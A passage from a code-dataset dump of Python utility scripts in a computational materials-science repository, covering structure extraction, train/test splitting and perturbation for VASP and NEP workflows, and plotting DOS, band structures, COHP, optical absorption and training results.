if symbols not in atoms_info.keys():
atoms_info[symbols] = 1
atom.info["Config_type"] = f"{symbols}-{config}-{atoms_info[symbols]}"
atoms_info[symbols] += 1
print(f"抽取到{len(extract)}个结构。")
# 这里将抽取的追加写入到微扰的里面
write(f"./extract_{file_path}.xyz", extract, format='extxyz', append=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="等间距抽取指定文件中的结构。")
parser.add_argument("filename", help="源数据文件", type=str)
parser.add_argument("step", help="每隔step抽取一个结构", type=int)
parser.add_argument("-c", "--config", help="生成Config_type.不指定则使用源数据文件的,如果没有则为空。", default=None,
type=str)
args = parser.parse_args()
extract(args.filename, args.step, args.config)
| 1,607 | Python | .py | 37 | 32.459459 | 99 | 0.651852 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,166 | pos2xyz.py | aboys-cb_VaspTool/script/tool/pos2xyz.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/13 20:18
# @Author : 兵
# @email : [email protected]
import sys
from ase.io import read, write
pos_path = sys.argv[1]
write("model.xyz", read(pos_path), format="extxyz")
| 244 | Python | .py | 9 | 25.777778 | 51 | 0.652361 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,167 | split_train.py | aboys-cb_VaspTool/script/tool/split_train.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/14 12:00
# @Author : 兵
# @email : [email protected]
import sys
from pathlib import Path
import numpy as np
from ase.io import read, write
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
from tqdm import tqdm
if Path("train-0.9.xyz").exists():
print("当前目录下已经有train-0.9.xyz文件,将追加到文件,而不是覆盖写入。")
if Path("test-0.1.xyz").exists():
print("当前目录下已经有train-0.9.xyz文件,将追加到文件,而不是覆盖写入。")
path = Path(sys.argv[1])
if path.is_file():
files = [path]
else:
files = []
for file in path.glob("*.xyz"):
files.append(file)
count = 0
trains = []
tests = []
for file in tqdm(files, "文件分割"):
atoms_list = read(file, ":", format="extxyz")
screen_list = []
for atoms in atoms_list:
if (np.any(abs(atoms.calc.results["forces"]) > 100)):
continue
screen_list.append(atoms)
count += len(screen_list)
train, test = train_test_split(screen_list, test_size=0.1, random_state=88, shuffle=True)
    # append=True below so that several systems can be merged into the same files
trains.extend(train)
tests.extend(test)
trains = shuffle(trains)
tests = shuffle(tests)
write("./train-0.9.xyz", trains, format='extxyz', append=True)
write("./test-0.1.xyz", tests, format='extxyz', append=True)
print(f"数据集一共有{count}条")
| 1,486 | Python | .py | 43 | 27.744186 | 93 | 0.677067 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,168 | split_xyz.py | aboys-cb_VaspTool/script/tool/split_xyz.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/8/28 15:14
# @Author : 兵
# @email : [email protected]
# Split an xyz file into chunks to distribute the work across multiple nodes
# python split_xyz.py new.xyz 10
import sys
from ase.io import read, write
job_num = int(sys.argv[2])
atoms_list = read(sys.argv[1], index=":", format="extxyz", do_not_split_by_at_sign=True)
def split_list(lst, n):
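    """Split lst into n contiguous chunks of nearly equal size; the first len(lst) % n chunks get one extra item."""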
k, m = divmod(len(lst), n)
return [lst[i * k + min(i, m):(i + 1) * k + min(i + 1, m)] for i in range(n)]
result = split_list(atoms_list, job_num)
for i, sublist in enumerate(result):
write(f"split-{i}-num-{len(sublist)}.xyz", sublist)
| 648 | Python | .py | 17 | 34 | 88 | 0.642978 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,169 | generate_perturb_structure.py | aboys-cb_VaspTool/script/tool/generate_perturb_structure.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/12 11:07
# @Author : 兵
# @email : [email protected]
"""
Usage: python generate_perturb_structure.py some_structure_path num
some_structure_path can be a POSCAR, CONTCAR or .vasp file
num is the number of perturbed structures to generate
"""
import sys
from pathlib import Path
import dpdata
from ase.io import write
from hiphive.structure_generation import generate_mc_rattled_structures
from tqdm import tqdm
path = Path(sys.argv[1])
if path.is_file():
files = [path]
else:
files = []
for file in path.glob("POSCAR"):
files.append(file)
for file in path.glob("*/POSCAR"):
files.append(file)
num = int(sys.argv[2])
for file in tqdm(files):
system = dpdata.System(file, "vasp/poscar")
perturbed_system = system.perturb(pert_num=int(num * 0.4),
cell_pert_fraction=0.05,
atom_pert_distance=0.1,
atom_pert_style='uniform')
structures = perturbed_system.to('ase/structure')
for structure in structures:
structure.info['Config_type'] = "dpdata perturb 0.05 0.1"
        # append=True appends to the file; change it yourself if you would rather overwrite
write(f"./perturb_{system.formula}.xyz", structures, format='extxyz', append=True)
rattle_std = 0.04
min_distance = 0.1
structures_mc_rattle = generate_mc_rattled_structures(
system.to('ase/structure')[0], int(num * 0.6), rattle_std, min_distance, n_iter=20)
for structure in structures_mc_rattle:
structure.info['Config_type'] = "hiphive mc perturb 0.04 0.1"
write(f"./perturb_{system.formula}.xyz", structures_mc_rattle, format='extxyz', append=True)
| 1,801 | Python | .py | 44 | 32.545455 | 96 | 0.656345 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,170 | plot_optic.py | aboys-cb_VaspTool/script/plot/plot_optic.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/5/22 13:07
# @Author : 兵
# @email : [email protected]
"""
Plot optical absorption curves
"""
import matplotlib.pyplot as plt
from pymatgen.analysis.solar.slme import absorption_coefficient, optics, slme
from pymatgen.io.vasp.outputs import Vasprun
plt.style.use("./science.mplstyle")
fig=plt.figure()
sort_name=[
("$Cs_2AgBiI_6$", "./Cs1Ag0.5Bi0.5I3.xml", 0.85),
("$Cs_2Cu_{0.25}Ag_{0.75}BiI_6$", "./Cs1Cu0.125Ag0.375Bi0.5I3.xml", 0.4618),
("$Cs_2AgBi_{0.75}Sb_{0.25}I_6$", "./Cs2AgBi0.75Sb0.25I6.xml", 0.5952)
]
for label, path, gap in sort_name:
vasp=Vasprun(path)
new_en, new_abs =absorption_coefficient(vasp.dielectric)
new_en += gap
plt.plot(new_en, new_abs,label=label)
data = optics(path)
print(data[2], data[3], slme(*data, thickness=5e-6))
plt.legend(ncol=2)
# plt.ylim(0,7)
# plt.ticklabel_format(style='sci', scilimits=(0,0))
plt.xlim(0, 5)
plt.xlabel("Photon energy (eV)")
plt.ylabel("Absorption ($cm^{-1}$)")
plt.yscale('log')
plt.savefig("./absorption_coefficient.png") | 1,095 | Python | .py | 33 | 30.272727 | 80 | 0.675676 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,171 | plot_energy_force.py | aboys-cb_VaspTool/script/plot/plot_energy_force.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/24 19:44
# @Author : 兵
# @email : [email protected]
"""
Usage: python plot_energy_force.py OUTCAR
"""
import os.path
import sys
import matplotlib.pyplot as plt
import numpy as np
from pymatgen.io.vasp.outputs import Outcar
try:
    path = sys.argv[1]
except IndexError:
    if os.path.exists("OUTCAR"):
        print("No file path given; found OUTCAR in the current directory")
        path = "OUTCAR"
    else:
        print("No file path given; please run: python plot_energy_force.py OUTCAR")
        exit()
print("Loading file...")
out = Outcar(path)
print("开始解析能量。。。")
out.read_pattern({
"e_fr_energy": r"free energy TOTEN\s+=\s+([\d\-\.]+)",
}, postprocess=float)
energy = np.array(out.data["e_fr_energy"])
energy = energy.flatten()
print("开始解析力。。。")
a = out.read_table_pattern(r"TOTAL-FORCE \(eV/Angst\)\n\s*\-+\n", r"\s+".join([r"(\-*[\.\d]+)"] * 6), r"-*\n",
last_one_only=False, postprocess=float)
force = np.array(a)[:, :, 3:]
force = force.reshape((force.shape[0], -1))
max_froce = np.max(force, 1)
result = np.vstack([np.arange(energy.shape[0]), energy, max_froce]).T
print("正在画图。。。")
fig, axes = plt.subplots(2, 1, sharex=True)
axes1, axes2 = axes
axes1.plot(result[:, 0], result[:, 1], label="energy", color="red")
axes1.set_ylabel("energy(eV)")
axes1.legend()
axes2.plot(result[:, 0], result[:, 2], label="max force", color="green")
axes2.set_ylabel("max force")
axes2.legend()
axes2.set_xlabel("steps")
plt.tight_layout()
plt.savefig("energy_forces.png", dpi=150)
np.savetxt("energy_forces.csv", result, header="step,energy,force", fmt='%.8f', comments="")
print("导出成功!./energy_forces.csv")
| 1,805 | Python | .py | 51 | 29.764706 | 110 | 0.651819 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,172 | plot_soc.py | aboys-cb_VaspTool/script/plot/plot_soc.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/5/9 22:40
# @Author : 兵
# @email : [email protected]
import itertools
import re
from collections import defaultdict
import numpy as np
from matplotlib import pyplot as plt
from monty.io import zopen
plt.rc('font', family='Times New Roman')
# Change the default font used in math text
from matplotlib import rcParams
rcParams['mathtext.default'] = 'regular'
import matplotlib as mpl
from pymatgen.electronic_structure.core import Spin
from pymatgen.io.vasp import BSVasprun
class Procar:
def __init__(self, filename):
"""
Args:
filename: Name of file containing PROCAR.
"""
headers = None
with zopen(filename, "rt") as file_handle:
preambleexpr = re.compile(r"# of k-points:\s*(\d+)\s+# of bands:\s*(\d+)\s+# of " r"ions:\s*(\d+)")
kpointexpr = re.compile(r"^k-point\s+(\d+).*weight = ([0-9\.]+)")
bandexpr = re.compile(r"^band\s+(\d+)")
ionexpr = re.compile(r"^ion.*")
expr = re.compile(r"^([0-9]+)\s+")
current_kpoint = 0
current_band = 0
done = False
spin = Spin.down
weights = None
# pylint: disable=E1137
for line in file_handle:
# print(line)
line = line.strip()
if bandexpr.match(line):
m = bandexpr.match(line)
# print(m.group())
current_band = int(m.group(1)) - 1
current_direction = -1
done = False
elif kpointexpr.match(line):
m = kpointexpr.match(line)
# print(m.groups())
current_kpoint = int(m.group(1)) - 1
weights[current_kpoint] = float(m.group(2))
if current_kpoint == 0:
spin = Spin.up if spin == Spin.down else Spin.down
done = False
elif headers is None and ionexpr.match(line):
headers = line.split()
headers.pop(0)
# headers.pop(-1)
data = defaultdict(lambda: np.zeros((nkpoints, nbands, nions, len(headers))))
phase_factors = defaultdict(
lambda: np.full(
(nkpoints, nbands, nions, 3, len(headers)),
np.NaN,
dtype=np.float32,
)
)
elif expr.match(line):
# print(line)
toks = line.split()
index = int(toks.pop(0)) - 1
# toks.pop(-1)
num_data = np.array([float(t) for t in toks[: len(headers)]])
# print(done)
if not done:
data[spin][current_kpoint, current_band, index, :] = num_data
else:
# for orb in range(len(["x","y","z"])):
phase_factors[spin][current_kpoint, current_band, index, current_direction, :] = num_data
elif line.startswith("tot"):
# print("tot")
current_direction += 1
done = True
elif preambleexpr.match(line):
m = preambleexpr.match(line)
nkpoints = int(m.group(1))
nbands = int(m.group(2))
nions = int(m.group(3))
weights = np.zeros(nkpoints)
self.nkpoints = nkpoints
self.nbands = nbands
self.nions = nions
self.weights = weights
self.orbitals = headers
self.data = data
self.phase_factors = phase_factors
def get_projection_on_elements(self, structure):
"""
Method returning a dictionary of projections on elements.
Args:
structure (Structure): Input structure.
Returns:
a dictionary in the {Spin.up:[k index][b index][{Element:values}]]
"""
dico = {}
for spin in self.data:
dico[spin] = [[defaultdict(float) for i in range(self.nkpoints)] for j in range(self.nbands)]
for iat in range(self.nions):
name = structure.species[iat].symbol
for spin, d in self.data.items():
# print(d.shape)
for k, b in itertools.product(range(self.nkpoints), range(self.nbands)):
dico[spin][b][k][name] = np.sum(d[k, b, iat, :])
# return
return dico
def get_spin_component_by_direction(self, direction="z"):
directions = ["x", "y", "z"]
if direction not in directions:
print("只支持x y z三个方向")
return
direction_index = directions.index(direction)
dico = {}
for spin in self.data:
dico[spin] = [[defaultdict(float) for i in range(self.nkpoints)] for j in range(self.nbands)]
for k, b in itertools.product(range(self.nkpoints), range(self.nbands)):
dico[spin][b][k] = np.sum(self.phase_factors[spin][k, b, :, direction_index, :], 0)[-1]
# print(self.phase_factors[spin][k, b, :, direction_index, :])
# print( (np.sum(self.phase_factors[spin][k, b, :, direction_index, :],0) ))
return dico
def get_occupation(self, atom_index, orbital):
"""
Returns the occupation for a particular orbital of a particular atom.
Args:
atom_num (int): Index of atom in the PROCAR. It should be noted
that VASP uses 1-based indexing for atoms, but this is
converted to 0-based indexing in this parser to be
consistent with representation of structures in pymatgen.
orbital (str): An orbital. If it is a single character, e.g., s,
p, d or f, the sum of all s-type, p-type, d-type or f-type
orbitals occupations are returned respectively. If it is a
specific orbital, e.g., px, dxy, etc., only the occupation
of that orbital is returned.
Returns:
Sum occupation of orbital of atom.
"""
orbital_index = self.orbitals.index(orbital)
return {
spin: np.sum(d[:, :, atom_index, orbital_index] * self.weights[:, None]) for spin, d in self.data.items()
}
def get_ticks(bs):
"""
Get all ticks and labels for a band structure plot.
Returns:
dict: A dictionary with 'distance': a list of distance at which
ticks should be set and 'label': a list of label for each of those
ticks.
"""
ticks, distance = [], []
for br in bs.branches:
start, end = br["start_index"], br["end_index"]
# print(br["name"])
labels = br["name"].split("-")
labels=[i for i in labels if i.strip()]
# skip those branches with only one point
if labels[0] == labels[1]:
continue
# add latex $$
for idx, label in enumerate(labels):
if label.startswith("\\") or "_" in label:
labels[idx] = "$" + label + "$"
if ticks and labels[0] != ticks[-1]:
ticks[-1] += "$\\mid$" + labels[0]
ticks.append(labels[1])
distance.append(bs.distance[end])
else:
ticks.extend(labels)
distance.extend([bs.distance[start], bs.distance[end]])
return {"distance": distance, "label": ticks}
def plot_spin_by_direction(path_dir,direction,
energy_min: float = -1,
energy_max: float = 1,):
bs_vasprun = BSVasprun(path_dir+"/vasprun.xml", parse_projected_eigen=True)
pro = Procar(path_dir+"/PROCAR")
projection_on_elements = pro.get_spin_component_by_direction(direction)
band_structure = bs_vasprun.get_band_structure(line_mode=True)
ware1,enery1,spin1 = [],[],[]
ware2,enery2,spin2 = [],[],[]
for band, projection in zip(band_structure.bands[Spin.up], projection_on_elements[Spin.up]):
for distance, energy, tot in zip(band_structure.distance, band, projection):
if tot >0:
ware1.append(distance)
enery1.append(energy - band_structure.efermi)
spin1.append(tot)
else:
ware2.append(distance)
enery2.append(energy - band_structure.efermi)
spin2.append(tot)
fig = plt.figure(figsize=(8,5))
norm = mpl.colors.Normalize(-1,1)
plt.plot([0, max(band_structure.distance)], [0, 0], 'k-.', linewidth=1)
xticks = get_ticks(band_structure)
for dis in xticks["distance"]:
plt.plot([dis,dis],[energy_min, energy_max],'k-.', linewidth=1)
plt.xticks(xticks["distance"],xticks["label"])
plt.xlim(0, max(xticks["distance"]))
a = plt.scatter(ware1, enery1,c=spin1,s=30,lw=0, alpha=0.5 ,cmap=mpl.cm.coolwarm,norm=norm, marker="o")
b = plt.scatter(ware2, enery2,c=spin2,s=20,lw=0, alpha=0.5,cmap=mpl.cm.coolwarm, norm=norm,marker="*")
plt.ylim(energy_min, energy_max)
plt.tick_params(axis='y', direction='in')
plt.colorbar( fraction=0.2, pad=0.1)
# plt.legend((a,b),("spin-up","spin-down"),fontsize=16 , frameon=False )
plt.tight_layout()
ax = plt.gca()
    # Adjust the ticks
ax.tick_params(labelsize=16,bottom=False, top=False, left=True, right=False)
plt.subplots_adjust(left=0.2, right=0.85, top=0.9, bottom=0.15, wspace=0.01, hspace=0.1)
plt.xlabel("Wavevector $k$", fontsize=16 )
plt.ylabel("$E-E_F$ / eV", fontsize=16 )
# plt.title("title",x=0.5,y=1.02)
# plt.savefig("bnd.eps",format='eps', transparent=True,bbox_inches='tight', dpi=600)
plt.savefig("band.jpg",bbox_inches='tight', dpi=1200)
if __name__ == '__main__':
    # Pass the directory that contains vasprun.xml here
plot_spin_by_direction("./danzi/vasprun/",
"z",
-2,2) | 10,164 | Python | .py | 225 | 32.915556 | 117 | 0.545649 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,173 | plot_nep.py | aboys-cb_VaspTool/script/plot/plot_nep.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/21 16:40
# @Author : 兵
# @email : [email protected]
import glob
import os
import matplotlib
matplotlib.use("Agg")
import matplotlib.pyplot as plt
import numpy as np
from sklearn.metrics import r2_score, mean_squared_error
Config = [
{"name": "energy", "unit": "eV/atom"},
{"name": "force", "unit": "eV/A"},
{"name": "virial", "unit": "eV/atom"},
{"name": "stress", "unit": "GPa"},
]
def plot_loss_result(axes: plt.Axes):
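    """Plot the training (and, if present, test) loss curves from loss.out on a log-log scale."""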
loss = np.loadtxt("loss.out")
axes.loglog(loss[:, 1:7],
label=['Total', 'L1-regularization',
'L2-regularization', 'Energy-train',
'Force-train', 'Virial-train'])
axes.set_xlabel('Generation/100')
axes.set_ylabel('Loss')
    if np.any(loss[:, 7:10] != 0):
axes.loglog(loss[:, 7:10], label=['Energy-test', 'Force-test', 'Virial-test'])
axes.legend(ncol=2, frameon=False)
def plot_train_result(axes: plt.Axes, config: dict):
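    """Parity plot of NEP vs DFT values from <name>_train.out / <name>_test.out, annotated with RMSE and R^2."""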
types = ["train", "test"]
colors = ['deepskyblue', 'orange']
xys = [(0.1, 0.7), (0.4, 0.1)]
for i in range(2):
data_type = types[i]
color = colors[i]
xy = xys[i]
if not os.path.exists(f"{config['name']}_{data_type}.out"):
continue
data = np.loadtxt(f"{config['name']}_{data_type}.out")
min_value = np.min(data)
max_value = np.max(data)
index = data.shape[1] // 2
axes.plot(data[:, index:], data[:, :index], '.', color=color, label=data_type)
axes.plot(np.linspace(min_value, max_value, num=10), np.linspace(min_value, max_value, num=10), '-', color="k")
rmse = np.sqrt(mean_squared_error(data[:, :index], data[:, index:]))
r2 = r2_score(data[:, :index], data[:, index:])
axes.text(xy[0], xy[1],
f'{data_type} RMSE={1000 * rmse:.3f}({"m" + config["unit"] if config["name"] != "stress" else "MPa"} )\n{data_type} $R^2$={r2:.3f}',
transform=axes.transAxes, fontsize=13)
handles, labels = axes.get_legend_handles_labels()
label_dict = dict(zip(labels, handles))
axes.legend(label_dict.values(), label_dict, frameon=False, ncol=2, columnspacing=1)
axes.set_xlabel(f'DFT {config["name"]} ({config["unit"]})')
axes.set_ylabel(f'NEP {config["name"]} ({config["unit"]})')
if __name__ == '__main__':
out_num = len(glob.glob("*.out"))
test_out_num = len(glob.glob("*test.out"))
rows = 2 if out_num >= 4 else 1
cols = (out_num - test_out_num) // rows + (out_num - test_out_num) % rows
fig = plt.figure(figsize=(6 * cols, 5 * rows))
grids = fig.add_gridspec(rows, cols)
if os.path.exists("loss.out"):
axes_index = 0
axes = fig.add_subplot(grids[axes_index])
axes_index += 1
plot_loss_result(axes)
else:
axes_index = 0
for config in Config:
if not os.path.exists(f"{config['name']}_train.out"):
continue
axes = fig.add_subplot(grids[axes_index])
plot_train_result(axes, config)
axes_index += 1
plt.subplots_adjust(left=0.1, right=0.95, bottom=0.1, top=0.95)
plt.savefig("nep_result.png", dpi=150)
| 3,234 | Python | .py | 77 | 35.246753 | 150 | 0.581662 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,174 | plot_bond.py | aboys-cb_VaspTool/script/plot/plot_bond.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/8/10 22:51
# @Author : 兵
# @email : [email protected]
"""
Plot how a bond length changes along an MD trajectory (quick ad-hoc script)
"""
# path=sys.argv[1]
import matplotlib.pyplot as plt
from ase.io import read as ase_read
path = "dump.xyz"
frames = ase_read(path, ":", format="extxyz")
bonds = []
for atoms in frames:
# print(atoms[16])
dis = atoms.get_distance(27, 55)
bonds.append(dis)
plt.plot(list(range(len(bonds))), bonds)
plt.show()
| 491 | Python | .py | 20 | 21.45 | 45 | 0.660633 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,175 | plot_dos.py | aboys-cb_VaspTool/script/plot/plot_dos.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/5/9 22:40
# @Author : 兵
# @email : [email protected]
import matplotlib
import numpy as np
matplotlib.use("Agg")
import palettable
from matplotlib import pyplot as plt
from pymatgen.electronic_structure.core import OrbitalType, Spin
from pymatgen.electronic_structure.plotter import DosPlotter
from pymatgen.io.vasp import Vasprun
plt.style.use("./science.mplstyle")
class MyDosPlotter(DosPlotter):
def get_plot(
self,
xlim=None,
ylim=None,
ax=None,
invert_axes=False,
beta_dashed=False,
):
n_colors = min(9, max(3, len(self._doses)))
colors = palettable.colorbrewer.qualitative.Set1_9.mpl_colors
ys = None
all_densities = []
all_energies = []
for dos in self._doses.values():
energies = dos["energies"]
densities = dos["densities"]
if not ys:
ys = {
Spin.up: np.zeros(energies.shape),
Spin.down: np.zeros(energies.shape),
}
new_dens = {}
for spin in [Spin.up, Spin.down]:
if spin in densities:
if self.stack:
ys[spin] += densities[spin]
new_dens[spin] = ys[spin].copy()
else:
new_dens[spin] = densities[spin]
all_energies.append(energies)
all_densities.append(new_dens)
keys = list((self._doses))
# all_densities.reverse()
# all_energies.reverse()
all_pts = []
for idx, key in enumerate(keys):
for spin in [Spin.up, Spin.down]:
if spin in all_densities[idx]:
energy = all_energies[idx]
densities = list(int(spin) * all_densities[idx][spin])
if invert_axes:
x = densities
y = energy
else:
x = energy
y = densities
all_pts.extend(list(zip(x, y)))
if self.stack:
ax.fill(x, y, color=colors[idx % n_colors], label=str(key))
elif spin == Spin.down and beta_dashed:
ax.plot(x, y, color=colors[idx % n_colors], label=str(key), linestyle="--" )
else:
ax.plot(x, y, color=colors[idx % n_colors], label=str(key) )
if xlim:
ax.set_xlim(xlim)
if ylim:
ax.set_ylim(ylim)
elif not invert_axes:
xlim = ax.get_xlim()
relevant_y = [p[1] for p in all_pts if xlim[0] < p[0] < xlim[1]]
ax.set_ylim((min(relevant_y), max(relevant_y)))
if not xlim and invert_axes:
ylim = ax.get_ylim()
relevant_y = [p[0] for p in all_pts if ylim[0] < p[1] < ylim[1]]
ax.set_xlim((min(relevant_y), max(relevant_y)))
if self.zero_at_efermi:
xlim = ax.get_xlim()
ylim = ax.get_ylim()
ax.plot(xlim, [0, 0], "k--" ) if invert_axes else ax.plot([0, 0], ylim, "k--" )
if invert_axes:
ax.axvline(x=0, color="k", linestyle="-" )
# ax.xaxis.set_major_locator(ticker.MaxNLocator(nbins=2, integer=True))
# ax.yaxis.set_major_locator(ticker.MaxNLocator( integer=True))
# ax.xaxis.set_minor_locator(ticker.AutoMinorLocator())
# ax.yaxis.set_minor_locator(ticker.AutoMinorLocator())
else:
# ax.xaxis.set_major_locator(ticker.MaxNLocator( integer=True))
# ax.yaxis.set_major_locator(ticker.MaxNLocator(nbins=2, integer=True))
# ax.xaxis.set_minor_locator(ticker.AutoMinorLocator())
# ax.yaxis.set_minor_locator(ticker.AutoMinorLocator())
ax.axhline(y=0, color="k", linestyle="-" )
# ax.tick_params(axis='both', which='both', direction='in')
# ax.tick_params(axis='both', which='both', direction='in')
# plt.xticks(fontsize=16)
# plt.yticks(fontsize=16)
# plt.tick_params(labelsize=16)
# Remove duplicate labels with a dictionary
handles, labels = ax.get_legend_handles_labels()
label_dict = dict(zip(labels, handles))
ax.legend(label_dict.values(), label_dict, frameon=False, ncol=2, columnspacing=1 )
def plot_all(self, dos_conf, invert_axes=True, energy_lim=None, density_lim=None):
orb_map = ["s", "p", "d", "f"]
if invert_axes:
xlim, ylim = density_lim, energy_lim
fig, axes = plt.subplots(1, len(dos_conf), sharex=True, sharey=True)
else:
xlim, ylim = energy_lim, density_lim
fig, axes = plt.subplots(len(dos_conf), 1, sharex=True, sharey=True)
if len(dos_conf)==1:
axes=[axes]
axes:list[plt.Axes]
for col, conf in enumerate(dos_conf):
vasprun = Vasprun(conf["path"], parse_potcar_file=False)
# self.add_dos("total", vasprun.tdos)
for elem, orbits in conf["projected"].items():
if isinstance(elem,int):
site=vasprun.final_structure[elem-1]
elem=site.label
elem_dos = vasprun.complete_dos.get_site_spd_dos(site)
else:
elem_dos = vasprun.complete_dos.get_element_spd_dos(elem)
for orb in orbits:
orb_type = OrbitalType(orb_map.index(orb))
self.add_dos(f"{elem}-{orb}", elem_dos[orb_type])
self.get_plot(xlim, ylim, ax=axes[col], invert_axes=invert_axes)
if invert_axes:
if col == 0:
axes[0].set_ylabel("Energy (eV)")
axes[col].set_xlabel("DOS (states/eV)" )
else:
if col == len(dos_conf) - 1:
axes[col].set_xlabel("Energy (eV)")
axes[col].set_ylabel("DOS (states/eV)" )
self._doses.clear()
plt.tight_layout(h_pad=0)
if __name__ == '__main__':
plotter = MyDosPlotter()
dos_conf = [
{"path": "./vasprun.xml",
"projected": {"I": ["p"], "Ag": ["d"], "Bi": ["p"]},
},
]
plotter.plot_all(dos_conf, energy_lim=(-2, 2), density_lim=(-10, 10), invert_axes=False)
plt.savefig("./dos.png", dpi=300)
| 6,571 | Python | .py | 149 | 31.302013 | 100 | 0.527298 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,176 | msd.py | aboys-cb_VaspTool/script/plot/msd.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/18 19:18
# @Author : 兵
# @email : [email protected]
from pymatgen.analysis.diffusion.analyzer import DiffusionAnalyzer
from pymatgen.core.trajectory import Trajectory
from pymatgen.io.vasp.outputs import Vasprun
# This step reads the trajectory (as from XDATCAR) and yields a series of structures
traj = Vasprun("./vasprun.xml").get_trajectory()
traj: Trajectory
# This step instantiates the DiffusionAnalyzer class
# via from_structures; the arguments are the specie, temperature, time step (POTIM) and step interval
# The step interval (step_skip) is not obvious, but according to the official tutorial:
# dt = timesteps * self.time_step * self.step_skip
diff = DiffusionAnalyzer.from_structures(traj, 'Ag', 300, 1, 10)
# The built-in plot_msd method can plot the MSD curve
# Some terminals cannot display figures; in that case call export_msdt() and plot the data yourself
# diff.plot_msd()
# plt.show()
| 957 | Python | .py | 20 | 35.2 | 66 | 0.758865 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,177 | plt.py | aboys-cb_VaspTool/script/plot/plt.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/13 22:37
# @Author : 兵
# @email : [email protected]
from gpyumd.load import load_thermo
from pylab import *
matplotlib.use('Agg')
data = load_thermo()
plot(list(range(data["U"].shape[0])), data["U"])
savefig("./en.png", dpi=150)
| 304 | Python | .py | 11 | 26.363636 | 48 | 0.652921 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,178 | plot_aimd.py | aboys-cb_VaspTool/script/plot/plot_aimd.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/6/13 12:09
# @Author : 兵
# @email : [email protected]
"""
Plot the energy evolution of an ab initio molecular dynamics run
"""
import sys
import matplotlib.pyplot as plt
from pymatgen.io.vasp.outputs import Vasprun
plt.style.use("./science.mplstyle")
# vasp_path=sys.argv[1]
plt.figure(figsize=(3.5, 2.625))
# vasp_path = "./vasprun.xml"
vasp_path = sys.argv[1]
vasprun = Vasprun(vasp_path, parse_potcar_file=False)
name = vasprun.final_structure.composition.to_pretty_string()
energies = [step["e_0_energy"] for step in vasprun.ionic_steps]
steps = list(range(1, len(energies) + 1))
plt.plot(steps, energies, label=name)
plt.ylabel("E0 Energy(eV)")
plt.xlabel("time(fs)")
plt.legend()
plt.tight_layout()
plt.savefig(f"./aimd-{name}.png", dpi=300)
| 784 | Python | .py | 26 | 28.230769 | 63 | 0.715646 | aboys-cb/VaspTool | 8 | 0 | 0 | GPL-2.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,179 | plot_dos_cohp.py | aboys-cb_VaspTool/script/plot/plot_dos_cohp.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2024/5/18 19:19
# @Author : 兵
# @email : [email protected]
from itertools import product
from typing import Literal
import matplotlib.pyplot as plt
import numpy as np
import palettable
from matplotlib.patches import ConnectionPatch
from numpy._typing import ArrayLike
from pymatgen.electronic_structure.cohp import Cohp, CompleteCohp
from pymatgen.electronic_structure.core import Spin, Orbital, OrbitalType
from pymatgen.electronic_structure.dos import Dos
from pymatgen.io.vasp import Vasprun
plt.style.use("./science.mplstyle")
class DosCohpPlotter:
def __init__(self, zero_at_efermi=True):
self.figure = plt.figure( )
self.stack=False
self.zero_at_efermi = zero_at_efermi
self._doses: dict[
str, dict[Literal["energies", "densities", "efermi"], float | ArrayLike | dict[Spin, ArrayLike]]
] = {}
self._cohps: dict[str, dict[str, np.ndarray | dict[Spin, np.ndarray] | float]] = {}
def add_dos(self, label, dos:Dos):
"""Add a dos for plotting.
        Pasted from elsewhere.
Args:
label: label for the DOS. Must be unique.
dos: Dos object
"""
if dos.norm_vol is None:
self._norm_val = False
energies = dos.energies - dos.efermi if self.zero_at_efermi else dos.energies
densities = dos.densities
efermi = dos.efermi
self._doses[label] = {
"energies": energies,
"densities": densities,
"efermi": efermi,
}
